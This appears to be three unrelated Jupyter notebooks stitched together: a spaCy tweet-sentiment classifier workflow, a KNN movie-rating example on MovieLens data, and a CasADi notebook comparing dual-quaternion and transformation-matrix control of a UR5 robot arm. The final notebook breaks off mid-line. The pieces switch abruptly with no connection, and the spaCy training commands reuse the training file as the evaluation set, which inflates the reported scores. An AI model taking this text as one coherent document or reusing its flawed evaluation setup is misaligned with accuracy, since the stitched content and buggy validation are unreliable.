Path(DRIVE_PATH/'eval_clas.json').open('w') as f: json.dump(eval_split, f)Validate data input for spacy Now should if we have enough data to train the model with `train` spacy command in CLI, for that I will use Spacy's `debug-data` command in CLI.!python -m spacy debug-data -h %%bash (python -m spacy debug-data en \ /content/drive/My\ Drive/Spacy/Pretrained/train_clas.json \ /content/drive/My\ Drive/Spacy/Pretrained/eval_clas.json \ -p 'textcat' \ ) =========================== Data format validation =========================== ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ⠼ Loading corpus... ⠴ Loading corpus... ⠦ Loading corpus... ⠧ Loading corpus... ⠇ Loading corpus... ⠏ Loading corpus... ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ⠼ Loading corpus... ⠴ Loading corpus... ⠦ Loading corpus... ⠧ Loading corpus... ⠇ Loading corpus... ✔ Corpus is loadable  =============================== Training stats =============================== Training pipeline: textcat Starting with blank model 'en' 0 training docs 0 evaluation docs ✘ No evaluation docs ✔ No overlap between training and evaluation data ✘ Low number of examples to train from a blank model (0)  ============================== Vocab & Vectors ============================== ℹ 0 total words in the data (0 unique) ℹ No word vectors present in the model[...]Data Generation (again) There must be something I missed now, I asked a question on [stackoverflow](https://stackoverflow.com/q/62003962/7752347) regarding this, turns out we need to get `.jsonl` format(again) and use the script provided in the [repo](https://github.com/explosion/spaCy/tree/master/examples/training/textcat_example_data) to convert to the required json format for training, now I need to change the data generation a little bit to do that.train_jsonl = [ # Get the text from dataframe row {'text': tweet.original_text, 'cats': {v: 1.0 if tweet.sentiment_class == k else 0.0 for k, v in label_map.items()}, 'meta':{"id": str(tweet.Index)} } for tweet in train_data[['original_text', 'sentiment_class']].itertuples(index=True, name='Tweet') ] train_jsonl[0]So instead of a list of `tuples` now I have a list of `dictionaries`. We need to split again to have an evaluation set# Stratified split with labels train_split, eval_split = train_test_split(train_jsonl, test_size=0.2, stratify=train_data['sentiment_class']) len(train_split), len(eval_split) #hide srsly.write_jsonl(DRIVE_PATH.parent/'train_texts.jsonl', train_split) srsly.write_jsonl(DRIVE_PATH.parent/'eval_texts.jsonl', eval_split)We still need to convert the `jsonl` to the required `json` format, now for that I will use the script named `textcatjsonl_to_trainjson.py` in this [repo](https://github.com/explosion/spaCy/tree/master/examples/training/textcat_example_data). Let's download the script from the repo.!wget -O script.py https://raw.githubusercontent.com/explosion/spaCy/master/examples/training/textcat_example_data/textcatjsonl_to_trainjson.py %%bash python script.py -m en /content/drive/My\ Drive/Spacy/train_texts.jsonl /content/drive/My\ Drive/Spacy python script.py -m en /content/drive/My\ Drive/Spacy/eval_texts.jsonl /content/drive/My\ Drive/SpacyLet's try to debug again Validate (again)#hide_input %%bash (python -m spacy debug-data en \ /content/drive/My\ Drive/Spacy/train_texts.json \ /content/drive/My\ Drive/Spacy/eval_texts.json \ -p 'textcat' \ ) =========================== Data format validation =========================== ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ⠼ Loading corpus... ⠴ Loading corpus... ⠦ Loading corpus... ⠧ Loading corpus... ⠇ Loading corpus... ⠏ Loading corpus... ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ⠼ Loading corpus... ⠴ Loading corpus... ⠦ Loading corpus... ⠧ Loading corpus... ⠇ Loading corpus... ⠏ Loading corpus... ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ⠼ Loading corpus... ⠴ Loading corpus... ⠦ Loading corpus... ⠧ Loading corpus... ⠇ Loading corpus... ⠏ Loading corpus... ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ⠼ Loading corpus... ⠴ Loading corpus... ⠦ Loading corpus... ⠧ Loading corpus... ⠇ Loading corpus... ⠏ Loading corpus... ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ✔ Corpus is loadable  =============================== Training stats =============================== Train[...]It worked !, Thanks to the answerer of this [question](https://stackoverflow.com/q/62003962/7752347), now we know that our data format is correct. Turns out there is another command to `convert` our files to spacy's JSON format which is mentioned [here](https://spacy.io/api/cliconvert).The output is pointing out that the evaluation set has some **data leakage**. I will try to remove that now.new_eval = [annot for annot in eval_split if all([annot['text'] != t['text'] for t in train_split])] len(new_eval), len(eval_split)We thought there were 5 samples leaking into the training data, it is six here, anyway let's try to validate the data again.#hide srsly.write_jsonl(DRIVE_PATH.parent/'eval_texts.jsonl', new_eval) #hide !python script.py -m en /content/drive/My\ Drive/Spacy/eval_texts.jsonl /content/drive/My\ Drive/Spacy %%bash (python -m spacy debug-data en \ /content/drive/My\ Drive/Spacy/train_texts.json \ /content/drive/My\ Drive/Spacy/eval_texts.json \ -p 'textcat' \ ) =========================== Data format validation =========================== ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ⠼ Loading corpus... ⠴ Loading corpus... ⠦ Loading corpus... ⠧ Loading corpus... ⠇ Loading corpus... ⠏ Loading corpus... ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ⠼ Loading corpus... ⠴ Loading corpus... ⠦ Loading corpus... ⠧ Loading corpus... ⠇ Loading corpus... ⠏ Loading corpus... ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ⠼ Loading corpus... ⠴ Loading corpus... ⠦ Loading corpus... ⠧ Loading corpus... ⠇ Loading corpus... ⠏ Loading corpus... ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ⠼ Loading corpus... ⠴ Loading corpus... ⠦ Loading corpus... ⠧ Loading corpus... ⠇ Loading corpus... ⠏ Loading corpus... ⠙ Loading corpus... ⠹ Loading corpus... ⠸ Loading corpus... ⠼ Loading corpus... ✔ Corpus is loadable  =============================== Training stats =====================[...]We are all set to start training now! Classifier Training I have made the command to train in CLI, Please refer the comments for details in the order of the arguments given here%%bash ## Arguement info # Language of text in which the Model is going to be trained # Path to store model # Training data json path # Evaluation data json path # Pipeline components that we are going to train # Number of iterations in total # Nummber of iterations to wait before improvement in eval accuracy # Pretrained model to start with # version # Augmentation for data(2 params) # Model Architecture for text classifier (cnn + bow) (python -m spacy train \ en \ -b en_core_web_sm \ /content/drive/My\ Drive/Spacy/Classifier \ /content/drive/My\ Drive/Spacy/train_texts.json \ /content/drive/My\ Drive/Spacy/train_texts.json \ -p "textcat" \ -n 100 \ -ne 10 \ -t2v /content/drive/My\ Drive/Spacy/Pretrained/fifty_iter/model49.bin \ -V 0.1 \ -nl 0.1 \ -ovl 0.1)Training pipeline: ['textcat'] Starting with base model 'en_core_web_sm' Adding component to base model 'textcat' Counting training words (limit=0) Loaded pretrained tok2vec for: [] Textcat evaluation score: F1-score macro-averaged across the labels 'POSITIVE, NEGATIVE, NEUTRAL' Itn Textcat Loss Textcat Token % CPU WPS --- ------------ ------- ------- ------- 1 26.738 39.853 100.000 177034 2 5.179 65.120 100.000 157933 3 1.483 76.615 100.000 178008 4 0.686 83.266 100.000 177567 5 0.288 86.236 100.000 169033 6 0.151 88.381 100.000 176679 7 0.090 90.099 100.000 166485 8 0.057 91.000 100.000 171279 9 0.135 92.472 100.000 175907 10 0.028 93.237 100.000 171838 11 0.023 94.147 100.000 175174 12 0.022 94.729 100.000 155840 13 0.021 95.248 100.000 161975 14 0.021 95.485 100.000 168029[...]I also tried to train without the pretrained model (ie)`en_core_web_sm`, The logs for that are here below. (Uncollapse to view), the results are not very different, the evaluation metrics are off the roof. We need to predict the test data and try to submit to the competition for a better picture of the model.#collapse %%bash ## Arguement info # Language of text in which the Model is going to be trained # Path to store model # Training data json path # Evaluation data json path # Pipeline components that we are going to train # Number of iterations in total # Nummber of iterations to wait before improvement in eval accuracy # Pretrained model to start with # version # Augmentation for data(2 params) # Model Architecture for text classifier (cnn + bow) (python -m spacy train \ en \ /content/drive/My\ Drive/Spacy/Classifier_without_using_websm \ /content/drive/My\ Drive/Spacy/train_texts.json \ /content/drive/My\ Drive/Spacy/train_texts.json \ -p "textcat" \ -n 100 \ -ne 10 \ -t2v /content/drive/My\ Drive/Spacy/Pretrained/fifty_iter/model49.bin \ -V 0.1 \ -nl 0.1 \ -ovl 0.1)✔ Created output directory: /content/drive/My Drive/Spacy/Classifier_without_using_websm Training pipeline: ['textcat'] Starting with blank model 'en' Counting training words (limit=0) Loaded pretrained tok2vec for: [] Textcat evaluation score: F1-score macro-averaged across the labels 'POSITIVE, NEGATIVE, NEUTRAL' Itn Textcat Loss Textcat Token % CPU WPS --- ------------ ------- ------- ------- 1 26.755 40.980 100.000 166278 2 5.293 65.846 100.000 172083 3 1.506 76.992 100.000 175595 4 0.695 83.314 100.000 173543 5 0.293 86.284 100.000 172609 6 0.156 88.784 100.000 171486 7 0.091 90.136 100.000 161118 8 0.056 91.761 100.000 156752 9 0.112 92.442 100.000 167948 10 0.028 93.329 100.000 162446 11 0.024 94.144 100.000 165753 12 0.022 95.206 100.000 168336 13 0.021 95.769 100.000 1[...]Prediction on test datatest_data = pd.read_csv(DATA_PATH/'test.csv', index_col=0) test_data.head()Clean test data We will clean the test data of links with regex as well.test_data['original_text'].replace( # Regex pattern to match : the text to replace with {'(https?:\/\/.*|pic.*)[\r\n]*' : ''}, regex=True, inplace=True) test_data.shape list_of_test_texts = test_data['original_text'].tolist()Let's load the Spacy model from our trainingimport spacy textcat_mod = spacy.load(DRIVE_PATH.parent/'Classifier/model-best')I will try to fasten the prediction by using multithreading as mentioned [here](https://explosion.ai/blog/multithreading-with-cython)d = textcat_mod(list_of_test_texts[0]) d.cats max(d.cats, key=lambda x: d.cats[x]) # to facilitate mapping the predictions label_map = {'POSITIVE':1, 'NEGATIVE':-1, 'NEUTRAL':0} # to gather predictions preds = [] for doc in textcat_mod.pipe(list_of_test_texts, n_threads=4, batch_size=100): pred_cls = max(doc.cats, key=lambda x: doc.cats[x]) preds.append(label_map[pred_cls]) len(preds), len(list_of_test_texts)Let's form the submissionsub_df = pd.DataFrame( preds, index=test_data.index, columns=['sentiment_class'] ) sub_df.shape sub_df.head() sub_df.to_csv(DRIVE_PATH.parent/'submission.csv')The submitted predictions scored a mere `39/100` in weighted f1-score, that's disappointing. -_- Let's analyze the predictions Prediction distributionsub_df['sentiment_class'].value_counts().plot(kind='bar') sub_df['sentiment_class'].value_counts()This looks very similar to the train datatrain_data['sentiment_class'].value_counts()Knn is a simple concept. It defines some distance between the items in your dataset and find the K closest items. You can use those items to predict some property of a test item, and vote for it. As an example , lets look at a movie prediction system . Lets try to guess the rating of the movie by looking at the 10 movies that are closest in terms of genres and popularity. In this project, we will load up every rating in the dataset into a pandas Dataframe.import pandas as pd import numpy as np r_cols = ['user id', 'movie_id', 'rating'] ratings = pd.read_csv('C:/Users//Desktop/DataScience/DataScience-Python3/ml-100k/u.data', sep='\t', names=r_cols, usecols=range(3)) ratings.head()grouping everything by movie ID and compute the total number of ratings(each movie's popularity) and the average rating of every moviemovieProperties = ratings.groupby('movie_id').agg({'rating': [np.size, np.mean]}) movieProperties.head() #The raw number of ratings isnt very useful for computing distances between movies , so we will create a new DataFrame that contains the normalized number of ratings.So, a value of 0 means nobody rated it and a value of 1 will mean it is the most popular movie here movieNumRatings = pd.DataFrame(movieProperties['rating']['size']) movieNormalizedNumRatings = movieNumRatings.apply(lambda x: (x - np.min(x)) / (np.max(x) - np.min(x))) movieNormalizedNumRatings.head() #now let's get the genre information from the u.item file . The way this works is there are 19 fields, each corresponding to a specific genre - a value of 0 means , it is not in the genre and a value of 1 means that is in that genre. A movie may have more than one genre associated with it . Each is put into a big python dictionary called movieDict. Every entry contains the movie name, list of genres, normalized popularity score, the average rating of the movie movieDict = {} with open('C:/Users//Desktop/DataScience/DataScience-Python3/ml-100k/u.item') as f: temp = '' for line in f: fields = line.rstrip('\\n').split('|') movieID = int(fields[0]) name = fields[1] genres = fields[5:25] genres = map(int, genres) movieDict[movieID] = (name, np.array(list(genres)), movieNormalizedNumRatings.loc[movieID].get('size'), movieProperties.loc[movieID].rating.get('mean')) movieDict[1] from scipy import spatial def ComputeDistance(a, b): genresA = a[1] genresB = b[1] genreDistance = spatial.distance.cosine(genresA, genresB) popularityA = a[2] popularityB = b[2] popularityDistance = abs(popularityA - popularityB) return genreDistance + popularityDistance ComputeDistance(movieDict[2], movieDict[4]) #The higher the distance, the less similar the movies are print (movieDict[2]) print (movieDict[4]) import operator def getNeighbors(movieID, K): distance = [] for movie in movieDict: if (movie != movieID): dist = ComputeDistance(movieDict[movieID], movieDict[movie]) distance.append((movie, dist)) distance.sort(key=operator.itemgetter(1)) neighbors = [] for x in range(K): neighbors.append(distance[x][0]) return neighbors K = 5 avgRating = 0 neighbors = getNeighbors(1,K) for neighbor in neighbors: avgRating += movieDict[neighbor][3] print (movieDict[neighbor][0] + " " + str(movieDict[neighbor][3])) avgRating /= float(K) avgRating movieDict[1]Graphs in articleThis notebook generates figures from the article. Specifically, the transformation matrix vs dual quaternion figures. The code is not well commented, and the results are not discussed other than in the article. Quaternion and Dual quaternion functionsLet's convert some casadi_geom expressions into casadi functions so they work with MX variables# Quaternions quat1 = cs.SX.sym("quat1",4) quat2 = cs.SX.sym("quat2",4) quaternion_product = cs.Function("quatprod",[quat1,quat2],[casadi_geom.quaternion_product(quat1,quat2)]) quaternion_conj = cs.Function("quatconj", [quat1], [casadi_geom.quaternion_conj(quat1)]) hamilton_operator_plus = cs.Function( "hamilton_operator_plus", [quat1], [cs.vertcat(cs.horzcat(quat1[3], -quat1[2], quat1[1], quat1[0]), cs.horzcat(quat1[2], quat1[3], -quat1[0], quat1[1]), cs.horzcat(-quat1[1], quat1[0], quat1[3], quat1[2]), cs.horzcat(-quat1[0], -quat1[1], -quat1[2], quat1[3]))]) hamilton_operator_minus = cs.Function( "hamilton_operator_minus", [quat1], [cs.vertcat(cs.horzcat(quat1[3], quat1[2], -quat1[1], quat1[0]), cs.horzcat(-quat1[2], quat1[3], quat1[0], quat1[1]), cs.horzcat(quat1[1], -quat1[0], quat1[3], quat1[2]), cs.horzcat(-quat1[0], -quat1[1], -quat1[2], quat1[3]))]) # Dual quaternions quat1 = cs.SX.sym("quat1",8) # Dual quaternions quat2 = cs.SX.sym("quat2",8) dual_quaternion_product = cs.Function("dualquatprod", [quat1,quat2], [casadi_geom.dual_quaternion_product(quat1,quat2)]) dual_quaternion_conj = cs.Function("dualquatconj", [quat1], [casadi_geom.dual_quaternion_conj(quat1)]) dual_quaternion_dualnorm = cs.Function("dualquatdualnorm", [quat1], [casadi_geom.dual_quaternion_norm2(quat1)[0],casadi_geom.dual_quaternion_norm2(quat1)[1]]) dual_quaternion_inv = cs.Function("dualquatinv", [quat1], [casadi_geom.dual_quaternion_inv(quat1)]) dual_quaternion_to_transformation_matrix = cs.Function("dualquat2transfmat", [quat1], [casadi_geom.dual_quaternion_to_transformation_matrix(quat1)]) dual_quaternion_to_pos = cs.Function("dualquat2pos", [quat1], [casadi_geom.dual_quaternion_to_pos(quat1)]) dual_hamilton_operator_plus = cs.Function( "dH_plus", [quat1], [cs.vertcat( cs.horzcat(quat1[3], -quat1[2], quat1[1], quat1[0], 0, 0, 0, 0), cs.horzcat(quat1[2], quat1[3], -quat1[0], quat1[1], 0, 0, 0, 0), cs.horzcat(-quat1[1], quat1[0], quat1[3], quat1[2], 0, 0, 0, 0), cs.horzcat(-quat1[0], -quat1[1], -quat1[2], quat1[3], 0, 0, 0, 0), cs.horzcat(quat1[7], -quat1[6], quat1[5], quat1[4], quat1[3], -quat1[2], quat1[1], quat1[0]), cs.horzcat(quat1[6], quat1[7], -quat1[4], quat1[5], quat1[2], quat1[3], -quat1[0], quat1[1]), cs.horzcat(-quat1[5], quat1[4], quat1[7], quat1[6], -quat1[1], quat1[0], quat1[3], quat1[2]), cs.horzcat(-quat1[4], -quat1[5], -quat1[6], quat1[7], -quat1[0], -quat1[1], -quat1[2], quat1[3]) )] ) dual_hamilton_operator_minus = cs.Function( "dH_minus", [quat1], [cs.vertcat( cs.horzcat(quat1[3], quat1[2], -quat1[1], quat1[0], 0, 0, 0, 0), cs.horzcat(-quat1[2], quat1[3], quat1[0], quat1[1], 0, 0, 0, 0), cs.horzcat(quat1[1], -quat1[0], quat1[3], quat1[2], 0, 0, 0, 0), cs.horzcat(-quat1[0], -quat1[1], -quat1[2], quat1[3], 0, 0, 0, 0), cs.horzcat(quat1[7], quat1[6], -quat1[5], quat1[4], quat1[3], quat1[2], -quat1[1], quat1[0]), cs.horzcat(-quat1[6], quat1[7], quat1[4], quat1[5], -quat1[2], quat1[3], quat1[0], quat1[1]), cs.horzcat(quat1[5], -quat1[4], quat1[7], quat1[6], quat1[1], -quat1[0], quat1[3], quat1[2]), cs.horzcat(-quat1[4], -quat1[5], -quat1[6], quat1[7], -quat1[0], -quat1[1], -quat1[2], quat1[3]) )] ) # Roll pitch yaw Euler angles xyz=cs.SX.sym("xyz",3) rpy=cs.SX.sym("rpy",3) dual_quaternion_rpy = cs.Function("dualquatrpy", [rpy], [casadi_geom.dual_quaternion_rpy(rpy)]) dual_quaternion_xyz = cs.Function("dualquatxyz", [xyz], [casadi_geom.dual_quaternion_translation(xyz)]) # Axis angle axis = cs.SX.sym("axis",3) ang = cs.SX.sym("ang") dual_quaternion_axis_translation = cs.Function("dualquataxistransl", [axis, ang], [casadi_geom.dual_quaternion_axis_translation(axis,ang)]) dual_quaternion_axis_rotation = cs.Function("dualquataxisrot", [axis, ang], [casadi_geom.dual_quaternion_axis_rotation(axis,ang)])UR5 - Dual Quaternion or Transformation Matrix representationTransformation matrices are a 16 element representation of the transformation between frames, with 12 unique elements. This represents the transformation as a rotation matrix and a displacement vector. Usually in robotics one follows the convention of first translating then rotating to match frames. Another representation is dual quaternions, they use two quaternions to represent the rotation and displacement of transformations and use 8 elements to describe the same transformation. In this example we will try to move from the HOME position to a desired frame, then later from a random frame to a random frame.t = cs.MX.sym("t") q = cs.MX.sym("q",6) # six actuated joints dq = cs.MX.sym("dq",6) UR5_home = [0.0, -cs.np.pi/2, 0.0, -cs.np.pi/2, 0.0, 0.0]Get forward kinematicsThe converter creates a kinematic chain from a specific root link to an end link. Running `check_urdf` on the file, we find that the UR5 contains the links:```root Link: world has 1 child(ren) child(1): base_link child(1): base child(2): shoulder_link child(1): upper_arm_link child(1): forearm_link child(1): wrist_1_link child(1): wrist_2_link child(1): wrist_3_link child(1): ee_link child(2): tool0```Let's set up the forward kinematics:urdf_path = "./urdf/ur5.urdf" links = ["world", "base_link", "base", "shoulder_link", "upper_arm_link", "forearm_link", "wrist_1_link", "wrist_2_link", "wrist_3_link", "tool0"] fk_dict = converter.from_file(root="base_link", tip="tool0", filename=urdf_path) print(str(fk_dict["joint_names"])) # Setup the function for the dual quaternion of the forward kinematics: Q_fk = fk_dict["dual_quaternion_fk"] # Setup the function for the transformation matrix of the forward kinematics: T_fk = fk_dict["T_fk"] # Test transformation matrix: Q0 = Q_fk(UR5_home) T0 = numpy_geom.dual_quaternion_to_transformation_matrix(Q0.toarray()) print("Distance to UR5_pome pos with dual quaternions: "+str(cs.norm_2(T0[:3,3]))) # Test transformation matrix: T0 = T_fk(UR5_home) print("Distance to UR5Home pos with transformation matrices: "+str(cs.norm_2(T0[:3,3])))Distance to UR5_pome pos with dual quaternions: 1.0192 Distance to UR5Home pos with transformation matrices: 1.0192UR5 LimitsTo achieve reasonable simulations, we impose some realistic limits on the robot. We grab the joint limits from the URDF and choose a reasonable max speed.# Check the joint limits from the URDF: q_max = cs.np.array(fk_dict["upper"]) q_min = cs.np.array(fk_dict["lower"]) print("q_min ",str(q_min)) print("q_max ",str(q_max)) # Define a reasonable max joint speed max_speed = cs.np.pi/5 # rad/s print("Max speed: ", max_speed) dt = 0.008 # Define the basic system limits # Uphold the joint constraints joint_limits_cnstr = cc.SetConstraint( label="Joint_Limits", expression = q, set_min = q_min, set_max = q_max) # Listify the joint limits constraints for pseudoinverse, starting with the lowest joint_limits_cnstr_list = [] for i in range(q.size()[0]): joint_limits_cnstr_list.append( cc.SetConstraint(label="limit_q_"+str(i), expression=q[i], set_min = q_min[i], set_max = q_max[i], priority = i)) # Let's have some speed limit joint_speed_limits_cnstr = cc.VelocitySetConstraint( label="Joint_speed_limits", expression = q, set_min = -cs.vertcat([max_speed]*q.size()[0]), set_max = cs.vertcat([max_speed]*q.size()[0]))Move from home to frameIn this section we will move from the HOME position to a desired frame. There are multiple methods of representing a constraint that could achieve this, and we will investigate two for each representation.# Desired frame rpy = [ 5.*(cs.np.pi/180.0),#5.*(cs.np.pi/180.0), 0.*(cs.np.pi/180.0),#0.5*cs.np.pi, 0.*(cs.np.pi/180.0) ] xyz = [ 0.5, 0.0, 0.5 ] # As a dual quaternion Q_des = numpy_geom.dual_quaternion_revolute(xyz, rpy, # cartesian and euler angles [1,0,0],0.0) # If we wanted an extra axis-angle rotation afterwards # As a transformation matrix T_des = cs.np.eye(4) T_des[:3,:3] = numpy_geom.rotation_rpy(*rpy) T_des[:3,3] = xyz # Some desired positionConstraint representations - Dual quaternion# Deviation from identity Q_id = numpy_geom.dual_quaternion_revolute([0.,0.,0.],[0.,0.,0.],[1.,0.,0.],0.0) Q_dist1 = dual_quaternion_product(Q_fk(q),dual_quaternion_conj(Q_des)) - Q_id Q_dist1_cnstr = cc.EqualityConstraint( label="Q_dist1_cnstr", expression=Q_dist1, constraint_type="soft", gain = 10.0, priority=301 ) Q_dist1_cnstr.eval = cs.Function("Q_dist1",[t,q],[cs.norm_2(Q_dist1)]) Hm = dual_hamilton_operator_minus(Q_des) Cconj = cs.diag([-1,-1,-1,1,-1,-1,-1,1]) Q_dist2 = cs.mtimes(Hm, cs.mtimes(Cconj, Q_des-Q_fk(q))) Q_dist2_cnstr = cc.EqualityConstraint( label="Q_dist2_cnstr", expression=Q_dist2, constraint_type="soft", gain=10.0, priority=301 ) Q_dist2_cnstr.eval = cs.Function("Q_dist2",[t,q], [cs.norm_2(Q_dist2)])Constraint representations - Transformation matrix# Deviation from identity T_dist1_cnstr = cc.EqualityConstraint( label="T_dist1", expression=cs.norm_fro(cs.mtimes(cs.inv(T_des),T_fk(q))-cs.np.eye(4)), gain=10.0, constraint_type="soft", priority=301 ) T_dist1_cnstr.eval = cs.Function("f_T_dist1", [t,q],[T_dist1_cnstr.expression]) # Frobenius norm of rotation deviation from identity, Position deviation T_dist2_cnstr = cc.EqualityConstraint( label="T_dist2", expression = cs.vertcat(T_fk(q)[:3,3]-T_des[:3,3], cs.norm_fro(cs.mtimes(cs.inv(T_des[:3,:3]),T_fk(q)[:3,:3]) - cs.np.eye(3))), gain = 10.0, constraint_type = "soft", priority = 300 ) T_dist2_cnstr.eval = cs.Function("f_T_dist2", [t,q], [cs.norm_2(T_dist2_cnstr.expression)]) # Three point strategy T_dist3_cnstr = cc.EqualityConstraint( label="T_dist3", expression = cs.vertcat(T_fk(q)[0, :3].T + T_fk(q)[:3,3] - T_des[0, :3] - T_des[:3,3], T_fk(q)[1, :3].T + T_fk(q)[:3,3] - T_des[1, :3] - T_des[:3,3], T_fk(q)[2, :3].T + T_fk(q)[:3,3] - T_des[2, :3] - T_des[:3,3]), gain=10.0, constraint_type= "soft", priority=300 ) T_dist3_cnstr.eval = cs.Function("f_T_dist3", [t,q], [cs.norm_2(T_dist3_cnstr.expression)])Compiling the controllers for all constraint situations# Let's test all the available controllers controller_classes = { "qp":cc.ReactiveQPController, "nlp":cc.ReactiveNLPController, "pinv":cc.PseudoInverseController, "mpc":cc.ModelPredictiveController } controllers = {} for key in controller_classes.keys(): controllers[key] = {} cnstr_situations={ "Q_dist1":Q_dist1_cnstr, "Q_dist2":Q_dist2_cnstr, "T_dist1":T_dist1_cnstr, "T_dist2":T_dist2_cnstr, "T_dist3":T_dist3_cnstr} print cnstr_situations.keys() # Compile all the controllers for each situation for cnstr in cnstr_situations.keys(): print("Compiling constraint: "+str(cnstr)) for key in controllers.keys(): if key == "pinv": #constraints = joint_limits_cnstr_list + [cnstr_situations[cnstr]] #constraints = [joint_limits_cnstr, cnstr_situations[cnstr]] constraints = [cnstr_situations[cnstr]] else: #constraints = [joint_limits_cnstr, joint_speed_limits_cnstr, cnstr_situations[cnstr]] constraints = [joint_limits_cnstr, cnstr_situations[cnstr]] #constraints = [cnstr_situations[cnstr]] skill_spec = cc.SkillSpecification( label=cnstr+"_skill", time_var=t, robot_var=q, constraints=constraints ) t0 = time.time() if key == "mpc": controllers[key][cnstr] = controller_classes[key](skill_spec=skill_spec, horizon_length=10, timestep=dt) else: controllers[key][cnstr] = controller_classes[key](skill_spec=skill_spec) if key == "pinv": controllers[key][cnstr].options["multidim_sets"] = True controllers[key][cnstr].options["pinv_method"] = "damped" controllers[key][cnstr].options["damping_factor"] = 1e-26 controllers[key][cnstr].setup_problem_functions() controllers[key][cnstr].setup_solver() print("\t-"+str(key)+", compile time: "+str(time.time()-t0)) timesteps = 1000 # Run all simulations for cntr_key in controllers.keys(): print("Simulating controller: "+str(cntr_key)) for cnstr_key in cnstr_situations.keys(): print("\t-"+str(cnstr_key)) print("\t\tSetting up initial value problem") controllers[cntr_key][cnstr_key].setup_initial_problem_solver() print("\t\tSolving initial value problem") slack_res = controllers[cntr_key][cnstr_key].solve_initial_problem(0,UR5_home)[-1] t0 = time.time() # Simulate it! t_sim = cs.np.array([dt*i for i in range(timesteps+1)]) t_run_sim = cs.np.array([dt*i for i in range(timesteps)]) # Robot q_sim = cs.np.zeros((len(t_sim),q.shape[0])) q_sim[0,:] = UR5_home dq_sim = cs.np.zeros((len(t_sim),dq.shape[0])) # Cartesian position p_sim = cs.np.zeros((len(t_sim), 3)) p_sim[0,:] = T_fk(UR5_home)[:3,3].toarray()[:,0] # Rotation R_sim = cs.np.zeros((len(t_sim), 3, 3)) R_sim[0,:,:] = T_fk(UR5_home)[:3,:3].toarray() # Error in constraint e_sim = cs.np.zeros(len(t_sim)) e_sim[0] = cnstr_situations[cnstr_key].eval(t_sim[0],q_sim[0,:]) # Loop for i in range(len(t_sim) - 1): t_run0 = time.time() res = controllers[cntr_key][cnstr_key].solve(t_sim[i],q_sim[i,:],warmstart_slack_var=slack_res) t_run_sim[i] = time.time() - t_run0 dq_sim[i,:] = res[0].toarray()[:,0] if res[-1] is not None: slack_res = res[-1].toarray()[:,0] for idx, dqi in enumerate(dq_sim[i,:]): dq_sim[i,idx] = max(min(dqi,max_speed),-max_speed) q_sim[i+1,:] = q_sim[i,:] + dq_sim[i,:]*dt p_sim[i+1,:] = T_fk(q_sim[i+1,:])[:3,3].toarray()[:,0] R_sim[i+1,:,:] = T_fk(q_sim[i+1,:])[:3,:3].toarray() e_sim[i+1] = cnstr_situations[cnstr_key].eval(t_sim[i],q_sim[i+1,:]) controllers[cntr_key][str(cnstr_key)+"_res"] = { "t_sim":t_sim, "dq_sim": dq_sim, "q_sim": q_sim, "p_sim": p_sim, "R_sim": R_sim, "e_sim": e_sim, "t_run_sim": t_run_sim } print("\t\tRuntime: "+str(time.time()-t0))Simulating controller: qp -T_dist2 Setting up initial value problem Solving initial value problem Runtime: 0.506732940674 -Q_dist2 Setting up initial value problem Solving initial value problem Runtime: 0.492563009262 -Q_dist1 Setting up initial value problem Solving initial value problem Runtime: 0.486197948456 -T_dist1 Setting up initial value problem Solving initial value problem Runtime: 0.438336133957 -T_dist3 Setting up initial value problem Solving initial value problem Runtime: 0.518247127533 Simulating controller: nlp -T_dist2 Setting up initial value problem Solving initial value problem ****************************************************************************** This program contains Ipopt, a library for large-scale nonlinear optimization. Ipopt is released as open source code under the Eclipse Public License (EPL). For more information visit http://projects.coin-or.org/Ipopt ***********************************************[...]Error plotsfig, ax = plt.subplots() for name in controllers.keys(): ax.plot(controllers[name]["Q_dist1_res"]["t_sim"], controllers[name]["Q_dist1_res"]["e_sim"], label=name) ax.legend() ax.set_xlabel("t [s]") ax.set_ylabel("error") ax.set_yscale("log") ax.set_title("Q\_dist1") import nice_plotting nice_plotting.latexify(fig_width=3.5,fig_height=1.2) fig, ax = plt.subplots() for name in controllers.keys(): ax.plot(controllers[name]["Q_dist2_res"]["t_sim"], controllers[name]["Q_dist2_res"]["e_sim"], label=name) ax.legend() ax.set_xlabel("t [s]") ax.set_ylabel("${e}_Q$") ax.set_yscale("log") nice_plotting.format_axes(ax) plt.savefig("e_Q_error.pdf",bbox_inches="tight") fig, ax = plt.subplots() for name in controllers.keys(): ax.plot(controllers[name]["T_dist1_res"]["t_sim"], controllers[name]["T_dist1_res"]["e_sim"], label=name) ax.legend() ax.set_xlabel("t [s]") ax.set_ylabel("error") ax.set_yscale("log") ax.set_title("T\_dist1") nice_plotting.latexify(fig_width=3.5,fig_height=1.2) fig, ax = plt.subplots() for name in controllers.keys(): ax.plot(controllers[name]["T_dist2_res"]["t_sim"], controllers[name]["T_dist2_res"]["e_sim"], label=name) ax.legend() ax.set_xlabel("t [s]") ax.set_ylabel("${e}_T$") ax.set_yscale("log") nice_plotting.format_axes(ax) plt.savefig("e_T_error.pdf",bbox_inches="tight") fig, ax = plt.subplots() for name in controllers.keys(): ax.plot(controllers[name]["T_dist3_res"]["t_sim"], controllers[name]["T_dist3_res"]["e_sim"], label=name) ax.legend() ax.set_xlabel("t [s]") ax.set_ylabel("error") ax.set_yscale("log") ax.set_title("T\_dist3")Seeing the pathsThe black line is the end-effector position, the red line is 0.1 in x direction from the end-effector center, green is y and blue is z.%matplotlib notebook nice_plotting.latexify(fig_width=3.5) ax = common_plots.frame_3d(controllers["qp"]["Q_dist2_res"],T_des=T_des) #ax.set_title("QP($e_Q$)") ax.set_xlim([-0.5, 1.]) ax.set_ylim([-0.5, 1.]) ax.set_zlim([0., 1]) ax.set_zlabel("z [m]") #nice_plotting.format_axes(ax) plt.savefig("e_Q_traj.pdf",bbox_inches="tight",pad_inches=0.25) nice_plotting.latexify(fig_width=3.5) ax = 